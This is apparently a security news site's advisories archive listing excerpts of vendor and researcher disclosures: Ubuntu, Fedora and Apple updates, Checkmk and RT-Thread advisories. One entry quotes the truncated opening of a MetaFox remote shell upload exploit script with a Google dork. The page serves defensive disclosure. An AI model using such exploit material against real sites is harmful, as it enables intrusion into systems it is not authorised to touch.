Category Archives: Advisories

USN-6673-2: python-cryptography vulnerability

Read Time:20 Second

USN-6673-1 provided a security update for python-cryptography.
This update provides the corresponding update for Ubuntu 16.04 LTS.

Original advisory details:

Hubert Kario discovered that python-cryptography incorrectly handled
errors returned by the OpenSSL API when processing incorrect padding in
RSA PKCS#1 v1.5. A remote attacker could possibly use this issue to expose
confidential or sensitive information. (CVE-2023-50782)

Read More

xen-4.18.0-7.fc40

Read Time:15 Second

FEDORA-2024-876e653a1c

Packages in this update:

xen-4.18.0-7.fc40

Update description:

x86: Register File Data Sampling [XSA-452, CVE-2023-28746]
GhostRace: Speculative Race Conditions [XSA-453, CVE-2024-2193]

x86: shadow stack vs exceptions from emulation stubs – [XSA-451,
CVE-2023-46841] (#2266326)

Read More

USN-6587-5: X.Org X Server vulnerabilities

Read Time:1 Minute, 33 Second

USN-6587-1 fixed several vulnerabilities in X.Org. This update provides
the corresponding update for Ubuntu 14.04 LTS.

Original advisory details:

Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled
memory when processing the RRChangeOutputProperty and
RRChangeProviderProperty APIs. An attacker could possibly use this issue to
cause the X Server to crash, or obtain sensitive information.
(CVE-2023-6478)

Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled
memory when processing the DeviceFocusEvent and ProcXIQueryPointer APIs. An
attacker could possibly use this issue to cause the X Server to crash,
obtain sensitive information, or execute arbitrary code. (CVE-2023-6816)

Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled
reattaching to a different master device. An attacker could use this issue
to cause the X Server to crash, leading to a denial of service, or possibly
execute arbitrary code. (CVE-2024-0229)

Olivier Fourdan and Donn Seeley discovered that the X.Org X Server
incorrectly labeled GLX PBuffers when used with SELinux. An attacker could
use this issue to cause the X Server to crash, leading to a denial of
service. (CVE-2024-0408)

Olivier Fourdan discovered that the X.Org X Server incorrectly handled
the curser code when used with SELinux. An attacker could use this issue to
cause the X Server to crash, leading to a denial of service.
(CVE-2024-0409)

Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled
memory when processing the XISendDeviceHierarchyEvent API. An attacker
could possibly use this issue to cause the X Server to crash, or execute
arbitrary code. (CVE-2024-21885)

Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled
devices being disabled. An attacker could possibly use this issue to cause
the X Server to crash, or execute arbitrary code. (CVE-2024-21886)

Read More

MetaFox Remote Shell Upload Exploit

Read Time:21 Second

Posted by j0ck1ng@tempr.email on Mar 13

#!/usr/bin/env python3# Exploit Title: MetaFox Remote Shell Upload# Google Dork: “Social network for niche
communities”# Exploit Author: The Joker# Vendor Homepage: https://www.phpfox.com# Version: <= 5.1.8import jsonimport
requestsimport sysif len(sys.argv) != 4:   sys.exit(“Usage: %s ” % sys.argv[0])   
requests.packages.urllib3.disable_warnings()endpoint = sys.argv[1] + “/api/v1/user/login”response =…

Read More

SEC Consult SA-20240307-0 :: Local Privilege Escalation via writable files in Checkmk Agent (CVE-2024-0670)

Read Time:21 Second

Posted by SEC Consult Vulnerability Lab, Research via Fulldisclosure on Mar 13

SEC Consult Vulnerability Lab Security Advisory < 20240307-0 >
=======================================================================
title: Local Privilege Escalation via writable files
product: Checkmk Agent
vulnerable version: 2.0.0, 2.1.0, 2.2.0
fixed version: 2.1.0p40, 2.2.0p23, 2.3.0b1, 2.4.0b1
CVE number: CVE-2024-0670
impact: high
homepage: https://checkmk.com

Read More

HNS-2024-05 – HN Security Advisory – Multiple vulnerabilities in RT-Thread RTOS

Read Time:21 Second

Posted by Marco Ivaldi on Mar 13

Hi,

Please find attached a security advisory that describes multiple
vulnerabilities we discovered in RT-Thread RTOS.

* Title: Multiple vulnerabilities in RT-Thread RTOS
* OS: RT-Thread <= 5.0.2
* Author: Marco Ivaldi <marco.ivaldi () hnsecurity it>
* Date: 2024-03-05
* CVE IDs and advisory URLs:
* CVE-2024-24334 – https://github.com/RT-Thread/rt-thread/issues/8282
* CVE-2024-24335 -…

Read More

APPLE-SA-03-12-2024-1 GarageBand 10.4.11

Read Time:24 Second

Posted by Apple Product Security via Fulldisclosure on Mar 13

APPLE-SA-03-12-2024-1 GarageBand 10.4.11

GarageBand 10.4.11 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/HT214090.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

GarageBand
Available for: macOS Ventura and macOS Sonoma
Impact: Processing a maliciously crafted file may lead to…

Read More

APPLE-SA-03-07-2024-7 visionOS 1.1

Read Time:24 Second

Posted by Apple Product Security via Fulldisclosure on Mar 13

APPLE-SA-03-07-2024-7 visionOS 1.1

visionOS 1.1 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214087.

Apple maintains a Security Releases page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

Accessibility
Available for: Apple Vision Pro
Impact: An app may be able to spoof system notifications and UI
Description: This…

Read More

APPLE-SA-03-07-2024-6 tvOS 17.4

Read Time:26 Second

Posted by Apple Product Security via Fulldisclosure on Mar 13

APPLE-SA-03-07-2024-6 tvOS 17.4

tvOS 17.4 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214086.

Apple maintains a Security Releases page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

Accessibility
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: A malicious app may be able to observe user data in log…

Read More